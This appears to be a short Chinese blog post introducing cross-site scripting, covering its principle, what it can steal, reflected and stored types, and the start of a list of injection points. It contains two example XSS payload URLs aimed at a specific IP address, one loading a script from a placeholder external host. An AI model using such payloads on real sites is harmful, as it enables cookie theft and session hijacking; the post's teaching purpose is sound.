web_security(摘自不知名的人

整理文档发现的压缩包,不知道千年是从哪里得到的文档了,当时就没压缩出来,一直到现在......

XSS跨站脚本攻击初步认识

1.XSS例子

1.http://120.78.72.189:9999/from=<script>alert("hello xss")</script>
2.http://120.78.72.189:9999/from=<script src="http://xxx.com/xx.js">alert("hello xss")</script>

2.原理

将本来显示文本的html显示区域恶意修改成一段js脚本

3.XSS能做什么

1.获取页面上的数据,通过dom随便拿。
2.可以拿到Cookies,一些用户登录的信息都能拿到。
3.劫持前段的逻辑,登录按钮直接变成付款按钮了。
4.将有XSS漏洞的网站,比如搜索框有XSS漏洞的,keyword连接上一个盗取cookie脚本,别人直接点开来就能直接盗取其Cookie。
5.空间博客类发表一篇带XSS漏洞的博客,只要任何人浏览了日志,也能够直接盗取浏览者的信息,还能盗取admin后台的管理员信息。
6.还有好多...

4.XSS攻击类型

1.反射型,直接通过URL注入,像之前的搜索框注入,反射型一般需要把长网址发送给被攻击者,容易被发现,所以一般都会做一个短网址转换。
2.存储型,存储到数据库读取的时候注入,像之前的日志注入,评论注入。

5.XSS攻击注入点

1.HTML节点内容,评论注入

posted @ 2021-07-21 16:34  buchiyexiao  阅读(97)  评论(0)    收藏  举报
Live2D